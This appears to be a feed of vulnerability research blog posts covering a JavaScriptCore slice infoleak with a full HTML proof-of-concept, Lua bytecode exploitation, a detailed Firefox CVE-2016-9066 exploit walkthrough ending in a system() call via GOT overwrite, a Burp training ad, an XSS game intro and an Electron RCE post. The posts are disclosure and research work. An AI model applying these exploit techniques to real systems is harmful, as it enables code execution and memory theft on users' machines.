Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

JSC %TypedArray%.slice infoleak

19 September 2016 at 00:00

Just a very quick writeup of a bug I found in JavaScriptCore a few weeks ago. The code was at that time only shipping in the Safari Technology Preview and got fixed there with release 12.

The bug was located in TypedArrayView.prototype.slice when performing species construction. From JSGenericTypedArrayViewPrototypeFunctions.h:

template<typename ViewClass>
EncodedJSValue JSC_HOST_CALL genericTypedArrayViewProtoFuncSlice(ExecState* exec)
{

    // ...

    JSArrayBufferView* result = speciesConstruct(exec, thisObject, args, [&]() {
        Structure* structure = callee->globalObject()->typedArrayStructure(ViewClass::TypedArrayStorageType);
        return ViewClass::createUninitialized(exec, structure, length);
    });
    if (exec->hadException())
        return JSValue::encode(JSValue());

    // --1--

    // We return early here since we don't allocate a backing store if length is 0 and memmove does not like nullptrs
    if (!length)
        return JSValue::encode(result);

    // The species constructor may return an array with any arbitrary length.
    length = std::min(length, result->length());
    switch (result->classInfo()->typedArrayStorageType) {
    case TypeInt8:
        jsCast<JSInt8Array*>(result)->set(exec, 0, thisObject, begin, length, CopyType::LeftToRight);
        break;

    /* other cases */
    }

    return JSValue::encode(result);
}

At –1– there is no check if the thisObject’s buffer has been transferred (detached/neutered) while executing a species constructor. Also note that the default constructor (the lambda expression) creates an uninitialized array. It is possible to detach the array buffer during speciesConstruct while also invoking the default constructor, for example by setting up the target array as follows:

var a = new Uint8Array(N);
var c = new Function();
c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });
a.constructor = c;

JSGenericTypedArrayView::set then does the following:

template<typename Adaptor>
bool JSGenericTypedArrayView<Adaptor>::set(
    ExecState* exec, unsigned offset, JSObject* object, unsigned objectOffset, unsigned length, CopyType type)
{
    const ClassInfo* ci = object->classInfo();
    if (ci->typedArrayStorageType == Adaptor::typeValue) {
        // The super fast case: we can just memcpy since we're the same type.
        JSGenericTypedArrayView* other = jsCast<JSGenericTypedArrayView*>(object);
        length = std::min(length, other->length());

        RELEASE_ASSERT(other->canAccessRangeQuickly(objectOffset, length));
        if (!validateRange(exec, offset, length))
            return false;

        memmove(typedVector() + offset, other->typedVector() + objectOffset, length * elementSize);
        return true;
    }

    // ...

here, other will be the original array which is detached by now. Its length will be zero and memmove becomes a nop. This results in an uninitialized array being returned to the caller, potentially leaking addresses and thus allowing for an ASLR bypass.

Here is a complete single-page application ;) to trigger the bug and dump the leaked data:

<!DOCTYPE html>
<html>
<head>
    <style>
    body {
      font-family: monospace;
    }
    </style>

    <script>
    if (typeof window !== 'undefined') {
        print = function(msg) {
            document.body.innerText += msg + '\n';
        }
    }

    function hex(b) {
        return ('0' + b.toString(16)).substr(-2);
    }

    function hexdump(data) {
        if (typeof data.BYTES_PER_ELEMENT !== 'undefined')
            data = Array.from(data);

        var lines = [];
        for (var i = 0; i < data.length; i += 16) {
            var chunk = data.slice(i, i+16);
            var parts = chunk.map(hex);
            if (parts.length > 8)
                parts.splice(8, 0, ' ');
            lines.push(parts.join(' '));
        }

        return lines.join('\n');
    }

    function trigger() {
        var worker = new Worker('worker.js');

        function transferArrayBuffer(ab) {
          worker.postMessage([ab], [ab]);
        }

        var a = null;

        var c = function(){};
        c.__defineGetter__(Symbol.species, function() { transferArrayBuffer(a.buffer); return undefined; });

        for (var i = 0; i < 1000; i++) {
            // Prepare array object
            a = new Uint8Array(new ArrayBuffer(1024));
            a.constructor = c;
            // Trigger the bug
            var b = a.slice(0, 1024);
            // Check if b now contains nonzero values
            if (b.filter((e) => e != 0).length > 0) {
                print('leaked data:');
                print(hexdump(b));
                break;
            }
        }
    }
    </script>
</head>
<body onload="trigger()">
    <p>please wait...</p><br />
</body>
</html>

The original report will eventually be available here.

Pwning Lua through 'load'

1 January 2017 at 00:00

In this post we’ll take a look at how to exploit the load function in Lua.

The Lua interpreter provides an interesting function to Lua code: load. It makes it possible to load (and subsequently execute) precompiled Lua bytecode at runtime (which one can obtain either through luac or by using string.dump on a function). This is interesting since not only does it require a parser for a binary format, but also allows execution of arbitrary bytecode. In fact, using afl to fuzz the bytecode loader will yield hundreds of crashes within a few minutes. Even the documentation explicitly warns about this function: Lua does not check the consistency of binary chunks. Maliciously crafted binary chunks can crash the interpreter.

Unsurprisingly, it turned out that malicious bytecode cannot just crash the interpreter, but also allows for native code execution within the interpreter process. This was the motivation for the “read-eval-pwn loop” CTF challenge of 33C3 CTF.

Let’s dig a bit deeper and find out what’s causing the interpreter to crash.

The Lua virtual machine is fairly simple, supporting only 47 different opcodes. The Lua interpreter uses a register-based virtual machine. As such many opcodes have register indices as operands. Other resources (e.g. constants) are also referenced by index. Take for example the implementation of the “LOADK” opcode, which is used to load a Lua value from a function’s constant table (to which the variable k points in the following code):

vmcase(OP_LOADK) {
    TValue *rb = k + GETARG_Bx(i);
    setobj2s(L, ra, rb);
    vmbreak;
}

We can see that there are no kinds of bounds checks. This is true for other opcodes as well (and also isn’t the only source of crashes). This is of course a known fact, but there also doesn’t seem to be a good solution for this (maybe apart from completely disabling load). See also this email to the Lua mailing list that I wrote some time ago and the replies, in particular this one.

Anyway, this looks like an interesting “feature” to write an exploit for.. ;)

Our plan will be to abuse the out-of-bounds indexing in the LOADK handler to inject custom objects into the virtual machine. The basic idea here is to allocate lots of strings containing fake Lua values through the constant table of the serialized function, hoping one would be placed behind the constants array itself during deserialization. Afterwards we use a the LOADK opcode with an out-of-bounds index to load a fake value in one of those strings.

Note that this approach has one drawback though: it relies on the heap layout since it indexes behind the heap chunk that holds the constants. This is a source of unreliability. It may be possible to avoid this by scanning (in the bytecode) for a particular value (e.g. a certain integer value) which marks the start of the fake values, but this is left as an exercise for the reader… ;)

At this point there is a very simple exploit in certain scenarios: assuming the Lua interpreter was modified such that e.g. os.execute was present in the binary but not available to Lua code (which happens if one just comments out this line in the source code), then we can simply create a fake function value that points to the native implementation and call it with whatever shell command we want to execute. If required, we can obtain the address of the interpreter code itself through tostring(load) (or any other native function for that matter):

> print(tostring(load))
"function: 0x41bcf0"

So what if we removed those functions entirely, and, to make it more interesting, also used clang’s control flow integrity on the binary so we couldn’t immediately gain RIP control through a fake function object? How can we exploit that?

Let’s start with an arbitrary read/write primitive:

  1. We’ll create a fake string object with its length set to 0x7fffffffffffffff, allowing us to leak memory behind the string object itself (unfortunately, Lua treats the index into the string as unsigned long, so reading before the string isn’t possible, but also not necessary)

  2. Since strings are immutable, we’ll also set up a fake table object (a combination of dict and list if you’re familiar with python), allowing us to write Lua values to anywhere in memory by setting the array pointer to the desired address

Next, we notice that the interpreter makes use of the setjmp mechanism to implement exceptions and yielding inside coroutines. The setjmp API is an easy way to bypass CFI protection since it directly loads various registers, including the instruction pointer, from a memory chunk.

To finish our exploit we will thus allocate coroutines until one of them is placed after our faked string. We can then leak the address of the jmpbuf structure, modify it from inside the coroutine and call yield, causing the interpreter to jump to an arbitrary address with fully controlled rsp register and a few others. A short ROP chain will do the rest.

Find the full exploit, together with all files necessary to reproduce the CTF challenge on my github.

Developing Burp Suite Extensions training

1 March 2017 at 23:00
We couldn't be more excited to present our brand-new class on web security and security automation. This blog post provides a quick overview of the 8-hours workshop.

Title

Developing Burp Suite Extensions - From manual testing to security automation.

Overview

Ensuring the security of web applications in continuous delivery environments is an open challenge for many organizations. Traditional application security practices slow development and, in many cases, don’t address security at all. Instead, a new approach based on security automation and tactical security testing is needed to ensure important components are being tested before going live. Security professionals must master their tools to improve the efficiency of manual security testing as well as to deploy custom security automation solutions.

Based on this premise, we have created a brand-new class taking advantage of Burp Suite - the de-facto standard for web application security. In just eight hours, we show you how to use Burp Suite’s extension capabilities and unleash the power of the tool to improve efficiency and effectiveness during security audits.

After a quick intro to Burp and its extension APIs, we work on setting up an optimal development environment enabling fast coding and debugging. While we develop our code using Oracle’s Netbeans, we also provide templates for IntelliJ IDEA and Eclipse.

We will create many different types of plugins:

  • Extension #1: A custom logger to provide persistency and data export functionalities
  • Extension #2: A simple (and yet useful) replay tool
  • Extension #3: Active check for Burp’s scanning engine
  • Extension #4: Passive check for Burp’s scanning engine

Finally, we leverage our extensions to build a security automation toolchain integrated in a CI environment (Jenkins). This workshop is based on real-life use cases where the combination of custom checks and automation can help uncovering nasty security vulnerabilities.

All templates and code-complete Burp Suite extensions will be available for free on Doyensec’s Github. If you are curious, we’ve already uploaded the first three modules.

Audience

The training is suitable for both web application security specialists and developers. Attendees are expected to have rudimental understanding of Burp Suite as well as basic object-oriented programming experience (Burp extensions will be developed in Java).

Requirements

Attendees should bring their own laptop with the latest Java as well as their favourite IDE installed.

Upcoming dates

Location Date Notes
Heidelberg
(Germany)
March 21, 2017 Delivered during Troopers 2017 security conference. There are still seats available. Book it today and get Burp swag during the training!
Warsaw
(Poland)
June 5, 2017 Come for WarCon invite-only conference, stay for the training!
For registration, please contact [email protected] with subject line "Burp Training Post-WarCon".

Private training

This training is delivered worldwide (English language) during both public and private events. Considering that the class is hands-on, we are able to accept up to 15 attendees. Video recording available on request.

Feel free to contact us at [email protected] for scheduling your class!

Exploiting a Cross-mmap Overflow in Firefox

10 March 2017 at 00:00

This post will explore how CVE-2016-9066, a simple but quite interesting (from an exploitation perspective) vulnerability in Firefox, can be exploited to gain code execution.

tl;dr an integer overflow in the code responsible for loading script tags leads to an out-of-bounds write past the end of an mmap chunk. One way to exploit this includes placing a JavaScript heap behind the buffer and subsequently overflowing into its meta data to create a fake free cell. It is then possible to place an ArrayBuffer instance inside another ArrayBuffer’s inline data. The inner ArrayBuffer can then be arbitrarily modified, yielding an arbitrary read/write primitive. From there it is quite easy to achieve code execution. The full exploit can be found here and was tested against Firefox 48.0.1 on macOS 10.11.6. The bugzilla report can be found here

The Vulnerability

The following code is used for loading the data for (external) script tags:

result
nsScriptLoadHandler::TryDecodeRawData(const uint8_t* aData,
                                      uint32_t aDataLength,
                                      bool aEndOfStream)
{
  int32_t srcLen = aDataLength;
  const char* src = reinterpret_cast<const char *>(aData);
  int32_t dstLen;
  nsresult rv =
    mDecoder->GetMaxLength(src, srcLen, &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  uint32_t haveRead = mBuffer.length();
  uint32_t capacity = haveRead + dstLen;
  if (!mBuffer.reserve(capacity)) {
    return NS_ERROR_OUT_OF_MEMORY;
  }

  rv = mDecoder->Convert(src,
                         &srcLen,
                         mBuffer.begin() + haveRead,
                         &dstLen);

  NS_ENSURE_SUCCESS(rv, rv);

  haveRead += dstLen;
  MOZ_ASSERT(haveRead <= capacity, "mDecoder produced more data than expected");
  MOZ_ALWAYS_TRUE(mBuffer.resizeUninitialized(haveRead));

  return NS_OK;
}

The code will be invoked by OnIncrementalData whenever new data has arrived from the server. The bug is a simple integer overflow, happening when the server sends more than 4GB of data. In that case, capacity will wrap around and the following call to mBuffer.reserve will not modify the buffer in any way. mDecode->Convert then writes data past the end of an 8GB buffer (data is stored as char16_t in the browser), which will be backed by an mmap chunk (a common practice for very large chunks).

The patch is also similarly simple:

   uint32_t haveRead = mBuffer.length();
-  uint32_t capacity = haveRead + dstLen;
-  if (!mBuffer.reserve(capacity)) {
+
+  CheckedInt<uint32_t> capacity = haveRead;
+  capacity += dstLen;
+
+  if (!capacity.isValid() || !mBuffer.reserve(capacity.value())) {
     return NS_ERROR_OUT_OF_MEMORY;
   }

The bug doesn’t look too promising at first. For one, it requires sending and allocating multiple gigabytes of memory. As we will see however, the bug can be exploited fairly reliably and the exploit completes within about a minute after opening the page on my 2015 MacBook Pro. We will now first explore how this bug can be exploited to pop a calculator on macOS, then improve the exploit to be more reliable and use less bandwidth afterwards (spoiler: we will use HTTP compression).

Exploitation

Since the overflow happens past the end of an mmap region, our first concern is whether it is possible to reliably allocate something behind the overflown buffer. In contrast to some heap allocators, mmap (which can be thought of as a memory allocator provided by the kernel) is very deterministic: calling mmap twice will result in two consecutive mappings if there are no existing holes that could satisfy either of the two requests. You can try this for yourself using the following piece of code. Note that the result will be different depending on whether the code is run on Linux or macOS. The mmap region grows towards lower addresses on Linux while it grows towards higher ones on macOS. For the rest of this post we will focus on macOS. A similar exploit should be possible on Linux and Windows though.

#include <sys/mman.h>
#include <stdio.h>

const size_t MAP_SIZE = 0x100000;       // 1 MB

int main()
{
    char* chunk1 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    char* chunk2 = mmap(NULL, MAP_SIZE, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

    printf("chunk1: %p - %p\n", chunk1, chunk1 + MAP_SIZE);
    printf("chunk2: %p - %p\n", chunk2, chunk2 + MAP_SIZE);

    return 0;
}

The output of the above program tells us that we should be able to allocate something behind the overflowing buffer by simply mmap’ing memory until all existing holes are filled, then allocating one more memory chunk through mmap. To verify this we will do the following:

  1. Load a HTML document which includes a script (payload.js, which will trigger the overflow) and asynchronously executes some JavaScript code (code.js, which implements step 3 and 5)

  2. When the browser requests payload.js, have the server reply with a Content-Length of 0x100000001 but only send the first 0xffffffff bytes of the data

  3. Afterwards, let the JavaScript code allocate multiple large (1GB) ArrayBuffers (memory won’t necessarily be used until the buffers are actually written to)

  4. Have the webserver send the remaining two bytes of payload.js

  5. Check the first few bytes of every ArrayBuffer, one should contain the data sent by the webserver

To implement this, we will need some kind of synchronization primitive between the JavaScript code running in the browser and the webserver. For that reason I wrote a tiny webserver on top of python’s asyncio library which contains a handy Event object for synchronization accross coroutines. Creating two global events makes it possible to signal the server that the client-side code has finished its current task and is now waiting for the server to perform the next step. The handler for /sync looks as follows:

async def sync(request, response):
    script_ready_event.set()
    await server_done_event.wait()
    server_done_event.clear()

    response.send_header(200, {
        'Content-Type': 'text/plain; charset=utf-8',
        'Content-Length': '2'
    })

    response.write(b'OK')
    await response.drain()

On the client side, I used synchronous XMLHttpRequests to block script execution until the server has finished its part:

function synchronize() {
    var xhr = new XMLHttpRequest();
    xhr.open('GET', location.origin + '/sync', false);
    // Server will block until the event has been fired
    xhr.send();
}

With that we can implement the above scenario and we will see that indeed one of the ArrayBuffer objects now contains our payload byte at the start of its buffer. There is one small limitation though: we can only overflow with valid UTF-16, as that is what Firefox uses internally. We’ll have to keep this in mind. What remains now is to find something more interesting to allocate instead of the ArrayBuffer that was overflown into.

Hunting for Target Objects

Since malloc (and thus the new operator in C++) will at some point request more memory using mmap, anything allocated with those could potentially be of interest for our exploit. I went a different route though. I initially wanted to check whether it would be possible to overflow into JavaScript objects and for example corrupt the length of an array or something similar. I thus started to dig around the JavaScript allocators to see where JSObjects are stored. Spidermonkey (the JavaScript engine inside Firefox) stores JSObjects in two separate regions:

  1. The tenured heap. Longer lived objects as well as a few selected object types are allocated here. This is a fairly classical heap that keeps track of free spots which it then reuses for future allocations.

  2. The Nursery. This is a memory region that contains short-lived objects. Most JSObjects are first allocated here, then moved into the tenured heap if they are still alive during the next GC cycle (this includes updating all pointers to them and thus requires that the gargabe collector knows about all pointers to its objects). The nursery requires no free list or similar: after a GC cycle the nursery is simply declared free since all alive objects have been moved out of it.

For a more in depth discussion of Spidermonkey internals see this phrack article.

Objects in the tenured heap are stored in containers called Arenas:

/*
 * Arenas are the allocation units of the tenured heap in the GC. An arena
 * is 4kiB in size and 4kiB-aligned. It starts with several header fields
 * followed by some bytes of padding. The remainder of the arena is filled
 * with GC things of a particular AllocKind. The padding ensures that the
 * GC thing array ends exactly at the end of the arena:
 *
 * <----------------------------------------------> = ArenaSize bytes
 * +---------------+---------+----+----+-----+----+
 * | header fields | padding | T0 | T1 | ... | Tn |
 * +---------------+---------+----+----+-----+----+
 * <-------------------------> = first thing offset
 */
class Arena
{
    static JS_FRIEND_DATA(const uint32_t) ThingSizes[];
    static JS_FRIEND_DATA(const uint32_t) FirstThingOffsets[];
    static JS_FRIEND_DATA(const uint32_t) ThingsPerArena[];

    /*
     * The first span of free things in the arena. Most of these spans are
     * stored as offsets in free regions of the data array, and most operations
     * on FreeSpans take an Arena pointer for safety. However, the FreeSpans
     * used for allocation are stored here, at the start of an Arena, and use
     * their own address to grab the next span within the same Arena.
     */
    FreeSpan firstFreeSpan;

    // ...

The comment already gives a fairly good summary: Arenas are simply container objects inside which JavaScript objects of the same size are allocated. They are located inside a container object, the Chunk structure, which is itself directly allocated through mmap. The interesting part is the firstFreeSpan member of the Arena class: it is the very first member of an Arena object (and thus lies at the beginning of an mmap-ed region), and essentially indicates the index of the first free cell inside this Arena. This is how a FreeSpan instance looks like:

class FreeSpan
{
    uint16_t first;
    uint16_t last;

    // methods following
}

Both first and last are byte indices into the Arena, indicating the head of the freelist. This opens up an interesting way to exploit this bug: by overflowing into the firstFreeSpan field of an Arena, we may be able to allocate an object inside another object, preferably inside some kind of accessible inline data. We would then be able to modify the “inner” object arbitrarily.

This technique has a few benefits:

  • Being able to allocate a JavaScript object at a chosen offset inside an Arena directly yields a memory read/write primitive as we shall see

  • We only need to overflow 4 bytes of the following chunk and thus won’t corrupt any pointers or other sensitive data

  • Arenas/Chunks can be allocated fairly reliably just by allocating large numbers of JavaScript objects

As it turns out, ArrayBuffer objects up to a size of 96 bytes will have their data stored inline after the object header. They will also skip the nursery and thus be located inside an Arena. This makes them ideal for our exploit. We will thus

  1. Allocate lots of ArrayBuffers with 96 bytes of storage

  2. Overflow and create a fake free cell inside the Arena following our buffer

  3. Allocate more ArrayBuffer objects of the same size and see if one of them is placed inside another ArrayBuffer’s data (just scan all “old” ArrayBuffers for non-zero content)

The Need for GC

Unfortunately, it’s not quite that easy: in order for Spidermonkey to allocate an object in our target (corrupted) Arena, the Arena must have previously been marked as (partially) free. This means that we need to free at least one slot in each Arena. We can do this by deleting every 25th ArrayBuffer (since there are 25 per Arena), then forcing garbage collection.

Spidermonkey triggers garbage collection for a variety of reasons. It seems the easiest one to trigger is TOO_MUCH_MALLOC: it is simply triggered whenever a certain number of bytes have been allocated through malloc. Thus, the following code suffices to trigger a garbage collection:

function gc() {
    const maxMallocBytes = 128 * MB;
    for (var i = 0; i < 3; i++) {
        var x = new ArrayBuffer(maxMallocBytes);
    }
}

Afterwards, our target arena will be put onto the free list and our subsequent overwrite will corrupt it. The next allocation from the corrupted arena will then return a (fake) cell inside the inline data of an ArrayBuffer object.

(Optional Reading) Compacting GC

Actually, it’s a little bit more complicated. There exists a GC mode called compacting GC, which will move objects from multiple partially filled arenas to fill holes in other arenas. This reduces internal fragmentation and helps freeing up entire Chunks so they can be returned to the OS. For us however, a compacting GC would be troublesome since it might fill the hole we created in our target arena. The following code is used to determine whether a compacting GC should be run:

bool
GCRuntime::shouldCompact()
{
    // Compact on shrinking GC if enabled, but skip compacting in incremental
    // GCs if we are currently animating.
    return invocationKind == GC_SHRINK && isCompactingGCEnabled() &&
        (!isIncremental || rt->lastAnimationTime + PRMJ_USEC_PER_SEC < PRMJ_Now());
}

Looking at the code there should be ways to prevent a compacting GC from happening (e.g. by performing some animations). It seems we are lucky though: our gc function from above will trigger the following code path in Spidermonkey, thus preventing a compacting GC since the invocationKind will be GC_NORMAL instead of GC_SHRINK.

bool
GCRuntime::gcIfRequested()
{
    // This method returns whether a major GC was performed.

    if (minorGCRequested())
        minorGC(minorGCTriggerReason);

    if (majorGCRequested()) {
        if (!isIncrementalGCInProgress())
            startGC(GC_NORMAL, majorGCTriggerReason);       // <-- we trigger this code path
        else
            gcSlice(majorGCTriggerReason);
        return true;
    }

    return false;
}

Writing an Exploit

At this point we have all the pieces together and can actually write an exploit. Once we have created the fake free cell and allocated an ArrayBuffer inside of it, we will see that one of the previously allocated ArrayBuffers now contains data. An ArrayBuffer object in Spidermonkey looks roughly as follows:

// From JSObject
GCPtrObjectGroup group_;

// From ShapedObject
GCPtrShape shape_;

// From NativeObject
HeapSlots* slots_;
HeapSlots* elements_;

// Slot offsets from ArrayBufferObject
static const uint8_t DATA_SLOT = 0;
static const uint8_t BYTE_LENGTH_SLOT = 1;
static const uint8_t FIRST_VIEW_SLOT = 2;
static const uint8_t FLAGS_SLOT = 3;

The XXX_SLOT constants determine the offset of the corresponding value from the start of the object. As such, the data pointer (DATA_SLOT) will be stored at addrof(ArrayBuffer) + sizeof(ArrayBuffer).

We can now construct the following exploit primitives:

  • Reading from an absolute memory address: we set the DATA_SLOT to the desired address and read from the inner ArrayBuffer

  • Writing to an absolute memory address: same as above, but this time we write to the inner ArrayBuffer

  • Leaking the address of a JavaScript Object: for that, we set the Object whose address we want to know as property of the inner ArrayBuffer, then read the address from the slots_ pointer through our existing read primitive

Process Continuation

To avoid crashing the browser process during the next GC cycle, we have to repair a few things:

  • The ArrayBuffer following the outer ArrayBuffer in our exploit, as that one will have been corrupted by the inner ArrayBuffer’s data. To fix this, We can simply copy another ArrayBuffer object into that location

  • The Cell that was originally freed in our Arena now looks like a used Cell and will be treated as such by the collector, leading to a crash since it has been overwritten with other data (e.g. a FreeSpan instance). We can fix this by restoring the original firstFreeSpan field of our Arena to mark that Cell as free again.

This suffices to keep the browser alive after the exploit finishes.

Summary

Putting everything together, the following steps will award us with an arbitrary read/write primitive:

  1. Insert a script tag to load the payload and eventually trigger the bug.

  2. Wait for the server to send up to 2GB + 1 bytes of data. The browser will now have allocated the final chunk that we will later overflow from. We try to fill the existing mmap holes using ArrayBuffer objects like we did for the very first PoC.

  3. Allocate JavaScript Arenas (memory regions) containing ArrayBuffers of size 96 (largest size so the data is still allocated inline behind the object) and hope one of them is placed right after the buffer we are about to overflow. Mmap allocates contiguous regions, so this can only fail if we don’t allocate enough memory or if something else is allocated there.

  4. Have the server send everything up to 0xffffffff bytes in total, completely filling the current chunk

  5. Free one ArrayBuffer in every arena and try to trigger gargabe collection so the arenas are inserted into the free list.

  6. Have the server send the remaining data. This will trigger the overflow and corrupt the internal free list (indicating which cells are unused) of one of the arenas. The freelist is modified such that the first free cell lies within the inline data of one of the ArrayBuffers contained in the Arena.

  7. Allocate more ArrayBuffers. If everything worked so far, one of them will be allocated inside the inline data of another ArrayBuffer. Search for that ArrayBuffer.

  8. If found, construct an arbitrary memory read/write primitive. We can now modify the data pointer of the inner ArrayBuffer, so this is quite easy.

  9. Repair the corrupted objects to keep the process alive after our exploit is finished.

Popping calc

What remains now is to somehow pop a calculator.

A simple way to run custom code is to abuse the JIT region, however, this technique is (partially) mitigated in Firefox. This can be bypassed given our exploitation primitives (e.g. by writing a small ROP chain and transferring control there), but this seemed to complicated for a simple PoC.

There are other Firefox-specific techniques to obtain code execution by abusing privileged JavaScript, but these require non-trivial modifications to the browser state (e.g. adding the turn_off_all_security_so_that_viruses_can_take_over_this_computer preference).

I instead ended up using some standard CTF tricks to finish the exploit: looking for cross references to libc functions that accept a string as first argument (in this case strcmp), I found the implementation of Date.toLocalFormat and noticed that it converts its first argument from a JSString to a C-string, which it then uses as first argument for strcmp. So we can simply replaced the GOT entry for strcmp with the address of system and execute data_obj.toLocaleFormat("open -a /Applications/Calculator.app");. Done :)

Improving the Exploit

At this point the basic exploit is already finished. This section will now describe how to make it more reliable and less bandwidth hungry.

Adding Robustness

Up until now our exploit simply allocated a few very large ArrayBuffer instances (1GB each) to fill existing mmap holes, then allocated roughly another GB of js::Arena instances to overflow into. It thus assumed that the browsers heap operations are more or less deterministic during exploitation. Since this isn’t necessarily the case, we’d like to make our exploit a little more robust.

A quick look at then implementation of the mozilla::Vector class (which is used to hold the script buffer) shows us that it uses realloc to double the size of its buffer when needed. Since jemalloc directly uses mmap for larger chunks, this leaves us with the following allocation pattern:

  • mmap 1MB
  • mmap 2MB, munmap previous chunk
  • mmap 4MB, munmap previous chunk
  • mmap 8MB, munmap previous chunk
  • mmap 8GB, munmap previous chunk

Because the current chunk size will always be larger than the sum of all previous chunks sizes, this will result in a lot of free space preceding our final buffer. In theory, we could simply calculate the total sum of the free space, then allocate a large ArrayBuffer afterwards. In practice, this doesn’t quite work since there will be other allocations after the server starts sending data and before the browser finishes decompressing the last chunk. Also jemalloc holds back a part of the freed memory for later usage. Instead we’ll try to allocate a chunk as soon as it is freed by the browser. Here’s what we’ll do:

  1. JavaScript code waits for the server using sync

  2. The server sends all data up to the next power of two (in MB) and thus triggers exactly one call to realloc at the end. The browser will now free a chunk of a known size

  3. The server sets the server_done_event, causing the JavaScript code to continue

  4. JavaScript code allocates an ArrayBuffer instance of the same size as the previous buffer, filling the free space

  5. This is repeated until we have send 0x80000001 bytes (thus forced the allocation of the final buffer)

This simple algorithm is implemented on the server side here and on the client in step 1. Using this algorithm, we can fairly reliably get an allocation behind our target buffer by spraying only a few megabytes of ArrayBuffer instances instead of multiple gigabytes.

Reducing Network Load

Our current exploit requires sending 4GB of data over the network. That’s easy to fix though: we’ll use HTTP compression. The nice part here is that e.g. zlip supports “streamed” compression, which makes it possible to incrementally compress the payload. With this we just have to add each part of the payload to the zlib stream, then call flush on it to obtain the next compressed chunk of the payload and send that to the server. The server will uncompress this chunk upon receiving it and perform the desired action (e.g. perform one realloc step).

This is implemented in the construct_payload method in poc.py and manages to reduce the size of the payload to about 18MB.

About Resource Usage

At least in theory, the exploit requires quite a lot of memory:

  • an 8GB buffer holding our “JavaScript” payload. Actually, it’s more like 12 GB, since during the final realloc, the content of a 4GB buffer must be copied to a new 8GB buffer

  • multiple (around 6GB) buffers allocated by JavaScript to fill the holes created by realloc

  • around 256 MB of ArrayBuffers

However, since many of the buffers are never written to, they don’t necessarily consume any physical memory. Moreover, during the final realloc, only 4GB of the new buffer will be written to before the old buffer is freed, so really “only” 8 GB are required there.

That’s still a lot of memory though. However, there are some technologies that will help reduce that number if physical memory becomes low:

  • Memory compression (macOS): large memory regions can be compressed and swapped out. This is perfect for our use case since the 8GB buffer will be completely filled with zeroes. This effect can be observed in the Activity Monitor.app, which at some point shows more than 6 GB of memory as “compressed” during the exploit.

  • Page deduplication (Windows, Linux): pages containing the same content are mapped copy-on-write (COW) and point to the same physical page (essentially reducing memory usage to 4KB).

CPU usage will also be quite high during peek times (decompression). However, CPU pressure could further be reduced by sending the payload in smaller chunks with delays in between (which would obviously increase the time it takes for the exploit to work though). This would also give the OS more time to compress and/or deduplicate the large memory buffers.

Further Possible Improvements

There are a few sources of unreliability in the current exploit, mostly dealing with timing:

  • During the sending of the payload data, if JavaScript runs the allocation before the browser has fully processed the next chunk, the allocations will “desyncronize”. This would likely lead to a failed exploit. Ideally, JavaScript would perform the allocation as soon as the next chunk has been received and processed. Which may be possible to determine by observing CPU usage.

  • If a garbage collection cycle runs after we have corrupted the FreeSpan but before we have fixed it, we crash

  • If a compacting gargabe collection cycle runs after we have freed some of the ArrayBuffers but before we have triggered the overflow, the exploit fails as the Arena will be filled up again.

  • If the fake free Cell happens to be placed inside the freed ArrayBuffer’s cell, then our exploit will fail and the browser will crash during the next gargabe collection cycle. With 25 cells per arena this gives us a theoretical 1/25 chance to fail. However, in my experiments, the free cells were always located at the same offset (1216 bytes into the Arena), indicating that the state of the engine at the beginning of the exploit is fairly deterministic (at least regarding the state of the Arenas holding objects of size 160 bytes).

From my experience, the exploit runs pretty reliable (>95%) if the browser is not under heavy usage. The exploit still works if 10+ other tabs are open, but might fail if for example a large web application is currently loading.

Conclusion

While the bug isn’t ideal from an attacker’s perspective, it still can be exploited fairly reliably and without too much bandwidth usage. It is interesting to see how various technologies (compression, same page merging, …) can make a bug such as this one easier to exploit.

Thinking of ways to prevent exploitability of such a bug, a few things come to mind. One fairly generic mitigation are guard pages (a page leading to a segfault whenever accessed in some way). These would have to be allocated before or after every mmap allocated region and would thus protect against exploitation of linear overflows such as this one. They would, however, not protect against non-linear overflows such as this bug. Another possibility would be to introduce internal mmap randomization to scatter the allocated regions throughout the address space (likely only effective on 64-bit systems). This would best be performed by the kernel, but could also be done in userspace.

XSSGame by Google at #HITB2017AMS – Writeup

26 April 2017 at 10:19
CTF’s homepage During the last edition of HITB in Amsterdam we partecipated in the XSSGame by Google: 8 XSS challenges to win a Nexus 5X. The various levels exposed common vulnerabilities present in modern web apps. Introduction Each level required to trigger the JavaScript’s alert function by creating an URL with a Cross-Site Scripting (XSS) payload inside, which should be executed without any user interaction: once it is executed, the server replies with the link to the following challenge.

Modern Alchemy: Turning XSS into RCE

2 August 2017 at 22:00

TL;DR

At the recent Black Hat Briefings 2017, Doyensec’s co-founder Luca Carettoni presented a new research on Electron security. After a quick overview of Electron’s security model, we disclosed design weaknesses and implementation bugs that can be leveraged to compromise any Electron-based application. In particular, we discussed a bypass that would allow reliable Remote Code Execution (RCE) when rendering untrusted content (for example via Cross-Site Scripting) even with framework-level protections in place.

In this blog post, we would like to provide insight into the bug (CVE-2017-12581) and remediations.

What’s Electron?

While you may not recognize the name, it is likely that you’re already using Electron since it’s running on millions of computers. Slack, Atom, Visual Studio Code, WordPress Desktop, Github Desktop, Basecamp3, Mattermost are just few examples of applications built using this framework. Any time that a traditional web application is ported to desktop, it is likely that the developers used Electron.

Electron Motto

Understanding the nodeIntegration flag

While Electron is based on Chromium’s Content module, it is not a browser. Since it facilitates the construction of complex desktop applications, Electron gives the developer a lot of power. In fact, thanks to the integration with Node.js, JavaScript can access operating system primitives to take full advantage of native desktop mechanisms.

It is well understood that rendering untrusted remote/local content with Node integration enabled is dangerous. For this reason, Electron provides two mechanisms to “sandbox” untrusted resources:

BrowserWindow

mainWindow = new BrowserWindow({  
	"webPreferences": { 
		"nodeIntegration" : false,  
		"nodeIntegrationInWorker" : false 
	}
});

mainWindow.loadURL('https://www.doyensec.com/');

WebView

<webview src="https://www.doyensec.com/"></webview>

In above examples, the nodeIntegration flag is set to false. JavaScript running in the page won’t have access to global references despite having a Node.js engine running in the renderer process.

Hunting for nodeIntegration bypasses

